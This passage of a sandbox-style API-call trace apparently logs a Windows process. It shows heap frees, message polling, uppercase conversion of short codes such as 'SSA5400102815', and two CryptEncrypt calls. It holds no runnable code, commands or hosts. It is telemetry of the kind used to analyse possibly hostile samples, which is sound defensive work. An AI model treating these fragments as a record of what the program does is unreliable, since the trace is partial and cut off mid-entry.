Flags=0x0, Size=0x10) returned 0x34aa310 [0209.800] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0209.801] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0209.801] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0209.801] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0209.801] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0209.801] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0209.801] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0209.801] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0209.801] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0209.801] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0209.801] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0209.801] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0209.801] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0209.801] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0209.801] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0209.801] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0209.802] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0209.802] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0209.802] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0209.802] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0209.802] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0209.802] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0209.802] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0209.802] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0209.802] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8a0 | out: hHeap=0x25c0000) returned 1 [0209.802] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0209.802] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0209.802] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0209.802] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0209.802] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0209.802] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0209.802] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0209.803] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0209.803] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0209.803] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaf0 | out: hHeap=0x25c0000) returned 1 [0209.803] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0209.803] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0209.803] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0209.803] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0209.803] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0209.803] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8a0 | out: hHeap=0x25c0000) returned 1 [0209.803] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0209.803] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0209.803] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaf0 | out: hHeap=0x25c0000) returned 1 [0209.803] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0209.803] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0209.803] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0209.803] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0209.803] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d978 | out: hHeap=0x25c0000) returned 1 [0209.803] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0209.803] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0209.804] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0209.804] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0209.804] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0209.804] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0209.804] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0209.804] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0209.804] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0209.804] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8a0 | out: hHeap=0x25c0000) returned 1 [0209.804] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0209.804] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0209.804] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0209.804] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0209.804] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0209.804] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0209.804] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0209.804] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0209.804] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0209.805] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaf0 | out: hHeap=0x25c0000) returned 1 [0209.805] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0209.805] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0209.805] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0209.805] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0209.805] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0209.805] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8a0 | out: hHeap=0x25c0000) returned 1 [0209.805] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0209.805] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0209.805] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaf0 | out: hHeap=0x25c0000) returned 1 [0209.805] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0209.805] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0209.805] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0209.805] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0209.805] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaf0 | out: hHeap=0x25c0000) returned 1 [0209.805] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0209.805] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0209.805] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0209.805] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0209.806] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d978 | out: hHeap=0x25c0000) returned 1 [0209.806] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0209.806] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0209.806] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0209.806] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0209.806] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0209.806] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0209.806] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0209.806] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0209.806] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0209.806] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0209.806] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0209.806] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0209.806] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0209.806] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0209.806] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0209.806] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0209.806] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0209.807] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0209.807] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0209.807] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0209.807] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0209.807] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa808 | out: hHeap=0x25c0000) returned 1 [0209.807] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaf0 | out: hHeap=0x25c0000) returned 1 [0209.807] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0209.807] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0209.807] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0209.807] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0209.807] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0209.807] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0209.807] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0209.807] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa808 | out: hHeap=0x25c0000) returned 1 [0209.807] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaf0 | out: hHeap=0x25c0000) returned 1 [0209.807] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0209.807] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0209.808] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0209.808] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0209.808] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0209.808] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0209.808] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0209.808] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0209.808] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0209.808] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0209.808] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0209.808] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0209.808] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0209.808] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0209.808] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0209.808] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0209.808] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0209.808] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0209.809] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0209.809] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0209.809] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0209.809] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0209.809] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab38 | out: hHeap=0x25c0000) returned 1 [0209.809] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0209.809] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0209.809] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0209.809] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0209.809] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0209.809] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0209.809] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0209.809] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0209.809] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0209.809] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0209.809] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0209.809] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0209.810] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0209.810] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0209.810] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0209.810] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0209.810] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0209.810] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0209.810] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0209.810] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0209.810] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0209.810] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0209.810] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0209.810] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0209.810] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0209.810] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0209.810] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0209.810] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0209.810] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0209.810] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0209.811] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0209.811] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0209.811] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0209.811] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0209.811] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0209.811] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0209.811] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0209.811] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0209.811] CryptEncrypt (in: hKey=0xaa59a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8bef68*=0x0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8bef68*=0x8) returned 1 [0209.811] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0209.811] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0209.811] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0209.811] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0209.811] CharLowerBuffW (in: lpsz="byte[8]", cchLength=0x7 | out: lpsz="byte[8]") returned 0x7 [0209.812] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0209.812] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0209.812] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0209.812] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0209.812] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0209.812] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0209.812] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0209.812] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0209.812] CryptEncrypt (in: hKey=0xaa59a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x24b1c28*, pdwDataLen=0x8bef68*=0x0, dwBufLen=0x8 | out: pbData=0x24b1c28*, pdwDataLen=0x8bef68*=0x8) returned 1 [0209.812] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0209.812] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0209.812] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0209.812] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0209.812] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: 